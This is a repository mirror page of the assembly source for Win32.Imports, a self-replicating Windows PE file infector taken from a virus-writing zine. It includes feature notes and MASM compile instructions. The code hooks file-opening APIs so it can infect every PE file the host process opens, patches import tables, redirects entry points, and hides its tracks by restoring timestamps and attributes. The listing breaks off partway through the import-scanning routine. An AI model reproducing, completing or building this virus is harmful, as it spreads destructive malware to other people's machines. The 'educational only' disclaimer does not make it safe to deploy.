Mirrors/vxug-MalwareSourceCode
13
1
Fork 0
mirror of https://github.com/vxunderground/MalwareSourceCode synced 2024-06-16 12:08:36 +00:00
Code Releases Activity
704d531393
vxug-MalwareSourceCode/Win32/Win32.Imports.asm
vxunderground 3cac606e5f
Add files via upload
2020-10-10 22:07:43 -05:00

1107 lines
47 KiB
NASM
Raw Blame History

COMMENT ` ---------------------------------------------------------------- )=-
-=( Natural Selection Issue #1 ----------------------------- Win32.Imports )=-
-=( ---------------------------------------------------------------------- )=-
-=( 0 : Win32.Imports Features ------------------------------------------- )=-
Imports: Locates LoadLibraryA and GetProcAddress, if they don't exist
then it will find two strings long enough, then copies them
to the virus and overwrites the entries in the Import Table
with our own.
Infects: PE files with any extension, without setting write bit
Strategy: Per-Process residency, it will infect any files
opened using CreateFileA/CreateFileW by the host.
We've also hooked GetProcAddress to hide ourself.
Compatibility: 95/98/ME/NT/2000 Compatible, avoids Win2K SFC'd files
Saves Stamps: Yes
MultiThreaded: No
Polymorphism: None
AntiAV / EPO: None
SEH Abilities: None
Payload: None
-=( 1 : Win32.Imports Design Goals --------------------------------------- )=-
: To test an implementation of MASMs type checking on API and PROC calls.
: To place all virus data into one structure that can be moved around in
memory so that the virus is outside of the hosts normal memory area.
: To be per process and hook file API to locate infectable files.
: To overwrite strings in the Import Table to import needed API and then
overwrite with the original API values. Doesn't need files to import
a GetProcAddress / LoadLibraryA to infect them properly. But still, does
not do manual Kernel32.DLL scanning.
It took 2 - 3 weeks of coding time, and 2/3 of that was in rewriting the
Import Table code over and over again to make it work. By the time that it
all worked, it was easy to pick a name, Win32.Imports.
-=( 2 : Win32.Imports Design Faults -------------------------------------- )=-
Its structure is horrible. When it was finished, I realised you could use
VirtualProtect API to make section data writeable, and so all of the code
based around moving the virus in memory is a waste of time.
It does, however, infect PE Headers perfectly in all PE files, and doesn't
even need to check for .EXE extensions, so it should infect .CPL and other PE
files as well.
Rather than spend time rewriting it to be more streamlined, it's better to
design a new virus from the ground up that does what you want.
-=( 3 : Win32.Imports Disclaimer ----------------------------------------- )=-
THE CONTENTS OF THIS ELECTRONIC MAGAZINE AND ITS ASSOCIATED SOURCE CODE ARE
COVERED UNDER THE BELOW TERMS AND CONDITIONS. IF YOU DO NOT AGREE TO BE BOUND
BY THESE TERMS AND CONDITIONS, OR ARE NOT LEGALLY ENTITLED TO AGREE TO THEM,
YOU MUST DISCONTINUE USE OF THIS MAGAZINE IMMEDIATELY.
COPYRIGHT
Copyright on materials in this magazine and the information therein and
their arrangement is owned by FEATHERED SERPENTS unless otherwise indicated.
RIGHTS AND LIMITATIONS
You have the right to use, copy and distribute the material in this
magazine free of charge, for all purposes allowed by your governing
laws. You are expressly PROHIBITED from using the material contained
herein for any purposes that would cause or would help promote
the illegal use of the material.
NO WARRANTY
The information contained within this magazine are provided "as is".
FEATHERED SERPENTS do not warranty the accuracy, adequacy,
or completeness of given information, and expressly disclaims
liability for errors or omissions contained therein. No implied,
express, or statutory warranty, is given in conjunction with this magazine.
LIMITATION OF LIABILITY
In *NO* event will FEATHERED SERPENTS or any of its MEMBERS be liable for any
damages including and without limitation, direct or indirect, special,
incidental, or consequential damages, losses, or expenses arising in
connection with this magazine, or the use thereof.
ADDITIONAL DISCLAIMER
Computer viruses will spread of their own accord between computer systems, and
across international boundaries. They are raw animals with no concern for the
law, and for that reason your possession of them makes YOU responsible for the
actions they carry out.
The viruses provided in this magazine are for educational purposes ONLY. They
are NOT intended for use in ANY WAY outside of strict, controlled laboratory
conditions. If compiled and executed these viruses WILL land you in court(s).
You will be held responsible for your actions. As source code these viruses
are inert and covered by implied freedom of speech laws in some
countries. In binary form these viruses are malicious weapons. FEATHERED
SERPENTS do not condone the application of these viruses and will NOT be held
LIABLE for any MISUSE.
-=( 4 : Win32.Imports Compile Instructions ------------------------------- )=-
MASM 6.15 and LINK 6.00.8447
ml /c /Cp /coff /Fl /Zi Imports.asm
link /debug /debugtype:cv /subsystem:windows Imports.obj
-=( 5 : Win32.Imports ---------------------------------------------------- ) `
.386p ; 386 opcodes
.model flat,stdcall ; Written for flat Win32
option casemap:none ; Use mixed case symbols
include masmwinc.inc ; Win32 constant symbols
includelib c:\masm32\lib\kernel32.lib ; First-run imported API
CreateFileW PROTO :DWORD, :DWORD, :DWORD, :DWORD, :DWORD, :DWORD, :DWORD
CloseHandle PROTO :DWORD
ExitProcess PROTO :DWORD
LoadLibraryA PROTO :DWORD
GetProcAddress PROTO :DWORD, :DWORD
VirtualAlloc PROTO :DWORD, :DWORD, :DWORD, :DWORD
; We'll drop ourselves into a file that can do CreateFileA/CreateFileW easily
Host SEGMENT 'CODE'
HostFile DW 'C', 'M', 'D', '.', 'E', 'X', 'E', 0
Exitpoint PROC
INVOKE CreateFileW, ADDR HostFile, GENERIC_READ OR GENERIC_WRITE, 0, 0, OPEN_EXISTING, 0, 0
.IF (eax != INVALID_HANDLE_VALUE)
INVOKE CloseHandle, eax
.ENDIF
INVOKE ExitProcess, NULL
; These are not called, only imported for the virus, and yes they like to
; crash when given bad values ;)
call LoadLibraryA
call GetProcAddress
call VirtualAlloc
Exitpoint ENDP
Host ENDS
; =============================================================================
; ( Procedure Layout ) ========================================================
; =============================================================================
; Also, INVOKE needs PROTOs to reference PROCs that are at the end of the file.
Exitpoint PROTO
Entrypoint PROTO
LoadsFile PROTO :PTR VX,:DWORD
CheckFile PROTO :PTR VX,:DWORD
WriteFile PROTO :PTR VX,:DWORD
SetupImports PROTO :PTR VX,:DWORD, :DWORD
ConvertAlign PROTO :DWORD, :DWORD
ConvertToRaw PROTO :DWORD, :DWORD
AlternateSfcIsFileProtected PROTO :DWORD, :DWORD
AlternateCheckSumMappedFile PROTO :DWORD, :DWORD, :DWORD, :DWORD
HookGetProcAddress PROTO :DWORD, :DWORD
HookCreateFileW PROTO :DWORD, :DWORD, :DWORD, :DWORD, :DWORD, :DWORD, :DWORD
HookCreateFileA PROTO :DWORD, :DWORD, :DWORD, :DWORD, :DWORD, :DWORD, :DWORD
; =============================================================================
; ( Constants ) ===============================================================
; =============================================================================
; We avoid files with bad attributes. Buffer_Size is for storing strings we've
; overwritten in the Import Table, Hooks Count is how many API we have in our
; Hooking Table. P_'s are RVA Pointers to locations inside our 1st Gen Host.
AVOIDED_FILES EQU FILE_ATTRIBUTE_DEVICE OR FILE_ATTRIBUTE_SPARSE_FILE OR \
FILE_ATTRIBUTE_REPARSE_POINT OR FILE_ATTRIBUTE_OFFLINE OR \
FILE_ATTRIBUTE_COMPRESSED OR FILE_ATTRIBUTE_ENCRYPTED
BUFFER_SIZE EQU 20H
HOOKS_COUNT EQU 3
P_HOSTS EQU 3000H + (Exitpoint - HostFile)
P_VIRUS EQU 5000H
P_LOADLIBRARYA EQU 8078H
P_GETPROCADDRESS EQU 807CH
P_CREATEFILEW EQU 8084H
; ============================================================================
; ( Virus Macros ) ===========================================================
; ============================================================================
; DESCRIBE splits long API strings from me into useable units of information :P
; tAPI TypeDef for this API for Parameter Checking
; mAPI Preconstructed MACRO for API, limited only to a few built ones
; bAPI [OPTIONAL] Buffer for stolen API Strings
; lAPI [OPTIONAL] Length of sAPI, ONLY useable on GetProc/LoadLibraryA
; pAPI Final API VA, or API RVA for GetProc/LoadLibraryA at Entrypoint
; sAPI API String
; DO_API is a wrapper for INVOKE that stops registers except EAX from changing.
; LOCATE is a small clean way to get Delta Offset into EDX
DESCRIBE MACRO NAME:REQ, COUNT:REQ, VALUE:=<0>, PARAMETERS, STACK, FINISH
LOCAL T_LIST, S_SIZE
T_LIST TEXTEQU <TYPEDEF PROTO>
REPEAT (COUNT - 1)
T_LIST CATSTR T_LIST, < :DWORD, >
ENDM
t&NAME &T_LIST :DWORD
m&NAME MACRO PARAMETERS
DO_API t&NAME PTR [edx][VX.p&NAME], STACK
&FINISH
ENDM
S_SIZE SIZESTR <&NAME>
IF &VALUE
b&NAME DB '&NAME'
DB (BUFFER_SIZE - S_SIZE) DUP (0)
l&NAME DD S_SIZE + 2
ENDIF
p&NAME DD &VALUE
s&NAME DB '&NAME', 0
ALIGN 2
ENDM
DO_API MACRO PARAMETERS:VARARG
PUSHAD
INVOKE &PARAMETERS
MOV [ESP+1CH], EAX
POPAD
ENDM
LOCATE MACRO
CALL @F
@@: POP EDX
SUB EDX, (($ - 1) - Virus_Data)
ENDM
; ============================================================================
; ( Main Data Structure ) ====================================================
; ============================================================================
; VX is used for all of the main data, and LVX a small version just for loadup.
VX STRUCT DWORD
; RVA of VX Structure inside Host, and RVA of Host's Original Entrypoint
SectionEntrypoint DD P_VIRUS
HostEntrypoint DD P_HOSTS
FileAttributes DD 0
FileCreationTime FILETIME {}
FileLastAccessTime FILETIME {}
FileLastWriteTime FILETIME {}
FileSize DD 0
; RVA of Kernel32.DLL Import Table so we can clear Binding in WriteFile.
BoundImport DD 0
; RVA of the Section we will end up in, and its Size. ThunkArrayRVA is
; used in SetupImports to track the FirstThunk entry of API in a loop.
LastSection DD 0
SizeSection DD 0
ThunkArrayRVA DD 0
; Our base API Data Table. Imagine if I didn't have MACRO and had to split
; this across more than one line each!
; Name, Count, Value, Macro Setup, Macro Parameters, Macro Finish
DESCRIBE CheckSumMappedFile, 4
DESCRIBE CloseHandle, 1
DESCRIBE CompareStringA, 6, , <STRING1, STRING2>, <LOCALE_SYSTEM_DEFAULT, NORM_IGNORECASE, STRING1, -1, STRING2, -1>, <cmp eax, 2>
DESCRIBE CreateFileA, 7, , <NAME>, <NAME, GENERIC_READ OR GENERIC_WRITE, 0, 0, OPEN_EXISTING, 0, 0 >
DESCRIBE CreateFileW, 7
DESCRIBE CreateFileMappingA, 6, , <HANDLE, FILESIZE>, <HANDLE, 0, PAGE_READWRITE, 0, FILESIZE, 0>
DESCRIBE ExitProcess, 1
DESCRIBE GetFileSize, 2
DESCRIBE GetFileTime, 4
DESCRIBE GetFileType, 1
DESCRIBE GetFileAttributesA, 1
DESCRIBE GetProcAddress, 2, P_GETPROCADDRESS
DESCRIBE LoadLibraryA, 1, P_LOADLIBRARYA
DESCRIBE MapViewOfFile, 5, , <HANDLE>, <HANDLE, FILE_MAP_ALL_ACCESS, NULL, NULL, NULL>
DESCRIBE SetFileAttributesA, 2
DESCRIBE SetFileTime, 4
DESCRIBE SfcIsFileProtected, 2
DESCRIBE UnmapViewOfFile, 1
DESCRIBE WideCharToMultiByte, 8
DESCRIBE VirtualAlloc, 4
DESCRIBE VirtualProtect, 4
UsedKernel DB 'KERNEL32.DLL', 0
UsedImage DB 'IMAGEHLP.DLL', 0
UsedSFC DB 'SFC.DLL', 0
; Our Table of API we need to import. ExitProcess and VirtualAlloc are now
; excluded, as they're not used past Entrypoint which uses them directly.
; Pointer to our Pointer, Pointer to DLL, Pointer to Alternate Routine
UsedAPI DD VX.pCheckSumMappedFile, VX.UsedImage, AlternateCheckSumMappedFile - Virus_Data
DD VX.pCloseHandle, VX.UsedKernel, NULL
DD VX.pCompareStringA, VX.UsedKernel, NULL
DD VX.pCreateFileA, VX.UsedKernel, NULL
DD VX.pCreateFileW, VX.UsedKernel, NULL
DD VX.pCreateFileMappingA, VX.UsedKernel, NULL
;D VX.pExitProcess, VX.UsedKernel, NULL
DD VX.pGetFileAttributesA, VX.UsedKernel, NULL
DD VX.pGetFileSize, VX.UsedKernel, NULL
DD VX.pGetFileTime, VX.UsedKernel, NULL
DD VX.pGetFileType, VX.UsedKernel, NULL
DD VX.pGetProcAddress, VX.UsedKernel, NULL
DD VX.pLoadLibraryA, VX.UsedKernel, NULL
DD VX.pMapViewOfFile, VX.UsedKernel, NULL
DD VX.pSetFileAttributesA, VX.UsedKernel, NULL
DD VX.pSetFileTime, VX.UsedKernel, NULL
DD VX.pSfcIsFileProtected, VX.UsedSFC, AlternateSfcIsFileProtected - Virus_Data
DD VX.pUnmapViewOfFile, VX.UsedKernel, NULL
;D VX.pVirtualAlloc, VX.UsedKernel, NULL
;D VX.pVirtualProtect, VX.UsedKernel, NULL
DD VX.pWideCharToMultiByte, VX.UsedKernel, NULL
DD NULL
; Our Table of API we want to hook, and corresponding routines in our code.
; RVA into Import Table, Replacement Address, Pointer to our Pointer
HookAPI DD NULL, HookCreateFileA - Virus_Data, VX.pCreateFileA
DD P_CREATEFILEW, HookCreateFileW - Virus_Data, VX.pCreateFileW
DD P_GETPROCADDRESS, HookGetProcAddress - Virus_Data, VX.pGetProcAddress
; Not really necessary, but don't want to take it out and forget later why
; everything crashes if I ever wanted to push a structure onto a stack :P
DB 0, 'Win32.Imports', 0
ALIGN 4
VX ENDS
LVX STRUCT DWORD
ImageBase DD 0
KernelHandle DD 0
pExitProcess DD 0
pLoadLibraryA DD 0
pGetProcAddress DD 0
pVirtualProtect DD 0
ProtectedArea DD 0
OldProtection DD 0
LVX ENDS
; =============================================================================
; ( Entrypoint and Setup ) ====================================================
; =============================================================================
Virus SEGMENT 'CODE'
Virus_Data VX {}
WinMain:
; Save a NULL on the stack which we will turn into a VA and RET to later
push NULL
Entrypoint PROC
LOCAL VD:LVX
; Save the registers, so programs don't crash! Calculate our ImageBase.
; EDX = Start Virus, EAX = Start Image.
pushad
pushfd
LOCATE
mov eax, edx
sub eax, [edx][VX.SectionEntrypoint]
; Save VAs of GetProcAddress/LoadLibraryA Pointers, then steal the VA of
; the API themselves.
; ESI = GetProcAddress API, EDI = LoadLibraryA API
mov esi, [edx][VX.pGetProcAddress]
lea ebx, [eax][esi ]
push ebx
mov esi, [ebx ]
mov edi, [edx][VX.pLoadLibraryA ]
lea ebx, [eax][edi ]
push ebx
mov edi, [ebx ]
; Save values into our stack structure, and overwrite the NULL we stored
; on the stack at Entrypoint, with the the return VA of the Host.
mov [VD.pGetProcAddress], esi
mov [VD.pLoadLibraryA], edi
mov [VD.ImageBase], eax
add eax, [edx][VX.HostEntrypoint]
mov [ebp][4], eax
; Save handle of Kernel32.DLL, plus ExitProcess and VirtualProtect VA's.
DO_API tLoadLibraryA PTR edi, ADDR [edx][VX.UsedKernel]
mov [VD.KernelHandle], eax
DO_API tGetProcAddress PTR esi, [VD.KernelHandle], ADDR [edx][VX.sExitProcess]
mov [VD.pExitProcess], eax
DO_API tGetProcAddress PTR esi, [VD.KernelHandle], ADDR [edx][VX.sVirtualProtect]
mov [VD.pVirtualProtect], eax
; Make the Import Table writeable, then calculate stolen API and fix up.
pop edi
mov [VD.ProtectedArea], edi
DO_API tVirtualProtect PTR [VD.pVirtualProtect], edi, 4, PAGE_EXECUTE_READWRITE, ADDR [VD.OldProtection]
DO_API tGetProcAddress PTR esi, [VD.KernelHandle], ADDR [edx][VX.bLoadLibraryA]
test eax, eax
jz WinFail
stosd
pop edi
DO_API tGetProcAddress PTR esi, [VD.KernelHandle], ADDR [edx][VX.bGetProcAddress]
test eax, eax
jz WinFail
stosd
; Move the virus into memory, and return to the Host if none is available.
mov ecx, Virus_Size
DO_API tGetProcAddress PTR esi, [VD.KernelHandle], ADDR [edx][VX.sVirtualAlloc]
DO_API tVirtualAlloc PTR eax, NULL, ecx, MEM_COMMIT OR MEM_RESERVE, PAGE_EXECUTE_READWRITE
.IF (eax == NULL)
jmp WinExit
.ELSE
lea esi, [edx]
lea edi, [eax]
shr ecx, 2
cld
rep movsd
lea edx, [eax]
.ENDIF
; Now that we can start writing to our data section, it's time to parse
; our UsedAPI list. RVAs are relative to VX.
; Format: RVA of our storage and ASCIIZ -- Or NULL [End of Table]
; RVA to DLL Name for this Import
; RVA of Alternate Internal API
lea esi, [edx][VX.UsedAPI]
.WHILE TRUE
; Abort if this entry marks the end of the table. Otherwise get it
; ready to write the final API address to. Load the next value as
; it's the RVA of the DLL Name.
lodsd
.BREAK .IF (eax == NULL)
lea edi, [edx][eax]
lea ebx, [edx][eax][4]
lodsd
; Get the API's address
DO_API tLoadLibraryA PTR [VD.pLoadLibraryA], ADDR [edx][eax]
DO_API tGetProcAddress PTR [VD.pGetProcAddress], eax, ebx
; Overwrite our Internal Entry with the API and load the Alternate
; API RVA just in case. If the API wasn't found and there is no
; Alternate Entry, then we abort immediately. Otherwise convert
; it to a VA and save it as the Internal Entry instead.
stosd
or eax, eax
lodsd
.IF (ZERO?)
.IF (eax == NULL)
jmp WinFail
.ENDIF
lea eax, [edx][eax]
mov [edi][-4], eax
.ENDIF
.ENDW
; Our last stage of setup is to hook all of the hookable API that the
; host uses
; Format: RVA of Import Address to Overwrite
; RVA relative to VX of our Hook API
; RVA of VX.pName
lea esi, [edx][VX.HookAPI]
mov ecx, HOOKS_COUNT
.REPEAT
; First entry is RVA of Import Address Table Entry. Second entry
; is the RVA of our Hook Procedure. Third entry is only used in
; setting up the HookAPI.
lodsd
.IF (eax == NULL)
lodsd
.ELSE
add eax, [VD.ImageBase]
mov edi, eax
lodsd
lea eax, [edx][eax]
stosd
.ENDIF
lodsd
.UNTILCXZ
WinExit:
; Restore section attributes.
mov edi, [VD.ProtectedArea]
DO_API tVirtualProtect PTR [VD.pVirtualProtect], edi, 4, [VD.OldProtection], ADDR [VD.OldProtection]
; Everything is AOK, we'll leave the virus and return to the Host, but
; we've already hooked it's API and will be called into action soon :)
popfd
popad
ret
WinFail:
; Something went terribly wrong and the Host is probably a trap, so we
; exit as quickly as possible and don't let it execute.
INVOKE tExitProcess PTR [VD.pExitProcess], -1
Entrypoint ENDP
; =============================================================================
; ( Control Center ) ==========================================================
; =============================================================================
LoadsFile PROC VD:PTR VX, FILENAME:DWORD
; Make sure the files are not protected under Win2K File Protection :|
mov edx, [VD]
mov esi, [FILENAME]
DO_API tSfcIsFileProtected PTR [edx][VX.pSfcIsFileProtected], NULL, esi
test eax, eax
jnz LoadsExit
; Avoid files with certain attributes, and if they are read only or if
; they are system, zero these attributes temporarily. We only change
; attributes if absolutely necessary, less logs, and heuristics, okay?
DO_API tGetFileAttributesA PTR [edx][VX.pGetFileAttributesA], esi
cmp eax, INVALID_HANDLE_VALUE
je LoadsExit
mov [edx][VX.FileAttributes], eax
test eax, AVOIDED_FILES
jnz LoadsExit
test eax, FILE_ATTRIBUTE_READONLY OR FILE_ATTRIBUTE_SYSTEM
.IF !(ZERO?)
DO_API tSetFileAttributesA PTR [edx][VX.pSetFileAttributesA], esi, FILE_ATTRIBUTE_NORMAL
test eax, eax
jz LoadsExit
.ENDIF
; Open our file. All opens are done in read-write mode as it saves me
; from having to mess around. Save the time stamps straight away.
mCreateFileA esi
cmp eax, INVALID_HANDLE_VALUE
je LoadsExitAttributes
push eax
mov ebx, eax
DO_API tGetFileTime PTR [edx][VX.pGetFileTime], ebx, ADDR [edx][VX.FileCreationTime], ADDR [edx][VX.FileLastAccessTime], ADDR [edx][VX.FileLastWriteTime]
test eax, eax
jz LoadsExitClose
push ebx
; Check the file size, don't Loads files that are too small or too big.
; Too small = Below 16K. Too big = Above 1G.
DO_API tGetFileSize PTR [edx][VX.pGetFileSize], ebx, NULL
cmp eax, 000004000H
jb LoadsExitTimes
cmp eax, 040000000H
ja LoadsExitTimes
mov [edx][VX.FileSize], eax
; Make sure this is a disk file and not some other handle we've opened!!
DO_API tGetFileType PTR [edx][VX.pGetFileType], ebx
cmp eax, FILE_TYPE_DISK
jne LoadsExitTimes
; Turn the file handle into a mapping handle, and map a view into memory
mCreateFileMappingA ebx, NULL
test eax, eax
jz LoadsExitTimes
push eax
mMapViewOfFile eax
cmp eax, INVALID_HANDLE_VALUE
je LoadsExitMap
push eax
; Run checks on the file and fill in virus information fields so that we
; can infect it if we want. We *DON'T* modify anything at this stage so
; if something goes wrong, the file is still in its original state.
DO_API CheckFile, edx, eax
test eax, eax
jz LoadsExitView
; Close our View and Map, then recreate the file bigger so the virus can
; fit inside. We don't know how much extra space the virus will take,
; until after PrepareFile, where it's had a chance to look at FileAlign.
pop ebx
DO_API tUnmapViewOfFile PTR [edx][VX.pUnmapViewOfFile], ebx
pop ebx
DO_API tCloseHandle PTR [edx][VX.pCloseHandle], ebx
; Turn the file handle into a mapping handle, and map a view into memory
pop ebx
push ebx
mCreateFileMappingA ebx, [edx][VX.FileSize]
test eax, eax
jz LoadsExitTimes
push eax
mMapViewOfFile eax
cmp eax, INVALID_HANDLE_VALUE
jz LoadsExitMap
push eax
; With everything prepared, now we write ourselves to the our new host :)
DO_API WriteFile, edx, eax
LoadsExitView: ; Close a View
pop ebx
DO_API tUnmapViewOfFile PTR [edx][VX.pUnmapViewOfFile], ebx
LoadsExitMap: ; Close a Map
pop ebx
DO_API tCloseHandle PTR [edx][VX.pCloseHandle], ebx
LoadsExitTimes: ; Restore Time Stamps
pop ebx
DO_API tSetFileTime PTR [edx][VX.pSetFileTime], ebx, ADDR [edx][VX.FileCreationTime], ADDR [edx][VX.FileLastAccessTime], ADDR [edx][VX.FileLastWriteTime]
LoadsExitClose: ; Close a Handle
pop ebx
DO_API tCloseHandle PTR [edx][VX.pCloseHandle], ebx
LoadsExitAttributes: ; Restore Attributes only if they've been changed
test [edx][VX.FileAttributes], FILE_ATTRIBUTE_READONLY OR FILE_ATTRIBUTE_SYSTEM
jz LoadsExit
DO_API tSetFileAttributesA PTR [edx][VX.pSetFileAttributesA], [FILENAME], [edx][VX.FileAttributes]
LoadsExit: ; Finally, we can exit!
ret
LoadsFile ENDP
; =============================================================================
; ( Prepare File For Infection ) ==============================================
; =============================================================================
CheckFile PROC VD:PTR VX, FILEHANDLE:DWORD
; We are mainly concerned with looping through the Imports and Sections
; gathering data, so first, we clear out our Import storage areas
xor eax, eax
mov edx, [VD ]
mov [edx][VX.pLoadLibraryA ], eax
mov [edx][VX.pGetProcAddress], eax
lea edi, [edx][VX.HookAPI ]
mov ecx, HOOKS_COUNT
.REPEAT
stosd
add edi, 8
.UNTILCXZ
mov edi, [FILEHANDLE]
; Check if the file is already infected [DOS Checksum = -1], and load up
; the PE Header, running it for basic Win32 Intel PE checks.
cmp [edi][IMAGE_DOS_HEADER.e_csum], -1
je CheckFail
cmp [edi][IMAGE_DOS_HEADER.e_magic], IMAGE_DOS_SIGNATURE
jne CheckFail
add edi, [edi][IMAGE_DOS_HEADER.e_lfanew]
cmp [edi][PE.Signature], IMAGE_NT_SIGNATURE
jne CheckFail
cmp [edi][PE.Machine], IMAGE_FILE_MACHINE_I386
jne CheckFail
test [edi][PE.Characteristics], IMAGE_FILE_EXECUTABLE_IMAGE
jz CheckFail
test [edi][PE.Characteristics], IMAGE_FILE_DLL
jnz CheckFail
cmp [edi][PE.SizeOfOptionalHeader], IMAGE_SIZEOF_NT_OPTIONAL32_HEADER
jne CheckFail
cmp [edi][PE.Magic], IMAGE_NT_OPTIONAL_HDR32_MAGIC
jne CheckFail
cmp [edi][PE.SizeOfHeaders], 0
je CheckFail
cmp [edi][PE.NumberOfRvaAndSizes], 2
jb CheckFail
; Begin a loop through our Import Table, searching for a Kernel32.DLL
mov eax, [edi][PE.DataDirectory.Import.RVA]
mov [edx][VX.BoundImport ], eax
DO_API ConvertToRaw, [FILEHANDLE], eax
test eax, eax
jz CheckFail
mov esi, eax
.WHILE TRUE
; Abort if it's the end of the table, otherwise string compare
DO_API ConvertToRaw, [FILEHANDLE], [esi][IMPORT.Names]
test eax, eax
jz CheckFail
mCompareStringA ADDR [edx][VX.UsedKernel], eax
.BREAK .IF (ZERO?)
add [edx][VX.BoundImport], SIZE IMPORT
add esi, SIZE IMPORT
.ENDW
; Set up all of our Import Information, and save the RVA of this Import
DO_API SetupImports, [VD], [FILEHANDLE], esi
test eax, eax
jz CheckFail
; Make sure that at least one Hook has been fulfilled, otherwise if we
; infect, it's a waste of time :|
lea esi, [edx][VX.HookAPI]
mov ecx, HOOKS_COUNT
.REPEAT
cmp dword ptr [esi], 0
jnz @F
add esi, 12
.UNTILCXZ
jmp CheckFail
@@: ; Scan through the section table until we locate the section with
; the highest RVA. Then we make sure it has a physical location.
movzx ecx, [edi][PE.NumberOfSections ]
add di, [edi][PE.SizeOfOptionalHeader ]
adc edi, PE.Magic
xor eax, eax
.REPEAT
cmp [edi][SECTION.VirtualAddress], eax
.IF !(CARRY?)
mov eax, [edi][SECTION.VirtualAddress]
mov esi, edi
.ENDIF
add edi, SIZE SECTION
.UNTILCXZ
; Save the RVA of the our Section for us to twiddle with in WriteFile.
mov edi, esi
sub esi, [FILEHANDLE]
mov [edx][VX.LastSection], esi
mov esi, [FILEHANDLE]
add esi, [esi][IMAGE_DOS_HEADER.e_lfanew ]
; Sections are allocated memory up to PE.SectionAlignment, so we want
; to place the virus after that, and ALSO skip past any overlay data
; that's at the end of the PE and not in any sections.
; 1. How big is the Section's memory allocation?
mov eax, [edi][SECTION.VirtualSize]
cmp eax, [edi][SECTION.SizeOfRawData]
ja @F
mov eax, [edi][SECTION.SizeOfRawData]
@@: DO_API ConvertAlign, [esi][PE.SectionAlignment], eax
; 2. How big is the file minus File Section, plus Memory Section?
mov ebx, eax
DO_API ConvertAlign, [esi][PE.FileAlignment], [edi][SECTION.SizeOfRawData]
test eax, eax
jz CheckFail
add eax, [edx][VX.FileSize]
sub eax, ebx
; 3. If the file is bigger than it would be, we have lots of overlay
; data, so base our start-of-virus value to be AFTER that.
cmp eax, [edx][VX.FileSize]
ja @F
mov eax, [edx][VX.FileSize]
@@: sub eax, [edi][SECTION.PointerToRawData]
push eax
add eax, [edi][SECTION.VirtualAddress ]
mov [edx][VX.SectionEntrypoint], eax
pop eax
; Now save the Section size [yes, we only need to FileAlign it], and
; of course the total size of the file.
add eax, Virus_Size
DO_API ConvertAlign, [esi][PE.FileAlignment], eax
mov [edx][VX.SizeSection], eax
add eax, [edi][SECTION.PointerToRawData]
mov [edx][VX.FileSize], eax
mov eax, -1
jmp CheckExit
CheckFail:
xor eax, eax
CheckExit:
ret
CheckFile ENDP
; =============================================================================
; ( Write Host ) ==============================================================
; =============================================================================
WriteFile PROC VD:PTR VX, FILEHANDLE:DWORD
; Set our infection marker | EDX = VD | EDI = PE | ESI = SECTION
mov edx, [VD]
mov edi, [FILEHANDLE]
mov [edi][IMAGE_DOS_HEADER.e_csum], -1
mov esi, [edx][VX.LastSection]
lea esi, [edi][esi]
add edi, [edi][IMAGE_DOS_HEADER.e_lfanew]
push edi
; Update SizeOfImage field, and then update with correct Section fields
mov eax, [esi][SECTION.VirtualSize ]
cmp eax, [esi][SECTION.SizeOfRawData ]
ja @F
mov eax, [esi][SECTION.SizeOfRawData ]
@@: DO_API ConvertAlign, [edi][PE.SectionAlignment], eax
sub [edi][PE.SizeOfImage], eax
mov ebx, [edx][VX.SizeSection]
add [edi][PE.SizeOfImage], ebx
mov [esi][SECTION.VirtualSize ], ebx
mov [esi][SECTION.SizeOfRawData], ebx
or [esi][SECTION.Characteristics], IMAGE_SCN_MEM_READ
and [esi][SECTION.Characteristics], NOT IMAGE_SCN_MEM_DISCARDABLE
; Update SizeOfCode/SizeOfInitializedData/SizeOfUninitializedData field
test [esi][SECTION.Characteristics], IMAGE_SCN_CNT_CODE
.IF !(ZERO?)
sub [edi][PE.SizeOfCode], eax
add [edi][PE.SizeOfCode], ebx
.ENDIF
test [esi][SECTION.Characteristics], IMAGE_SCN_CNT_INITIALIZED_DATA
.IF !(ZERO?)
sub [edi][PE.SizeOfInitializedData], eax
add [edi][PE.SizeOfInitializedData], ebx
.ENDIF
test [esi][SECTION.Characteristics], IMAGE_SCN_CNT_UNINITIALIZED_DATA
.IF !(ZERO?)
sub [edi][PE.SizeOfUninitializedData], eax
add [edi][PE.SizeOfUninitializedData], ebx
.ENDIF
; Force Win32 to do RunTime Binding
; [Extra 2 MOVs I don't think are necessary, so I left them out for now]
; mov [edi][PE.DataDirectory.BoundImport.RVA], 0
; mov [edi][PE.DataDirectory.BoundImport.Sizes], 0
DO_API ConvertToRaw, [FILEHANDLE ], [edx][VX.BoundImport]
mov [eax][IMPORT.TimeDateStamp], 0
; Save and set the PE Entrypoint
mov ebx, [edx][VX.SectionEntrypoint ]
push ebx
add ebx, SIZE VX
xchg [edi][PE.AddressOfEntryPoint], ebx
mov [edx][VX.HostEntrypoint], ebx
pop ebx
; Write the virus to the file, finally!
DO_API ConvertToRaw, [FILEHANDLE], ebx
mov esi, edx
mov edi, eax
mov ecx, Virus_Size / 4
cld
rep movsd
; Do the checksums, one of which is pointing to a junk area
pop edi
DO_API tCheckSumMappedFile PTR [edx][VX.pCheckSumMappedFile], [FILEHANDLE], [edx][VX.FileSize], ADDR [edx][VX.LastSection], ADDR [edi][PE.CheckSum]
ret
WriteFile ENDP
; =============================================================================
; ( Scan Imports ) ============================================================
; =============================================================================
SetupImports PROC VD:PTR VX, FILEHANDLE:DWORD, TABLE:DWORD
; Switch between the Thunk Tables for Inprise/Microsoft compatability
mov edx, [VD]
mov esi, [TABLE]
mov eax, [esi][IMPORT.OriginalFirstThunk]
test eax, eax
jnz @F
mov eax, [esi][IMPORT.FirstThunk]
@@: DO_API ConvertToRaw, [FILEHANDLE], eax
test eax, eax
jz SetupImportsExit
; Begin the loop, which skips Ordinal entry and WENDs on a NULL entry
mov esi, eax
xor ecx, ecx
.WHILE TRUE
lodsd
test eax, eax
.IF !(SIGN?)
DO_API ConvertToRaw, [FILEHANDLE], eax
.BREAK .IF (eax == 0)
push esi
push ecx
lea esi, [eax][2]
; Store the RVA of the associated FirstThunk entry, so we
; can located the Imported API VA during execution, if we
; need it [if this entry is a Hook/Used API]
mov eax, [TABLE]
mov eax, [eax][IMPORT.FirstThunk]
lea eax, [eax][ecx * 4]
mov [edx][VX.ThunkArrayRVA], eax
; Firstly, loop through and save details if this entry is
; Hookable. Note some API are Hooked and Used, so we do
; keep looping even if the API matches.
lea ebx, [edx][VX.HookAPI]
mov ecx, HOOKS_COUNT
.REPEAT
mov edi, [ebx][8]
mCompareStringA ADDR [edx][edi][4], esi
.IF (ZERO?)
push [edx][VX.ThunkArrayRVA]
pop [ebx]
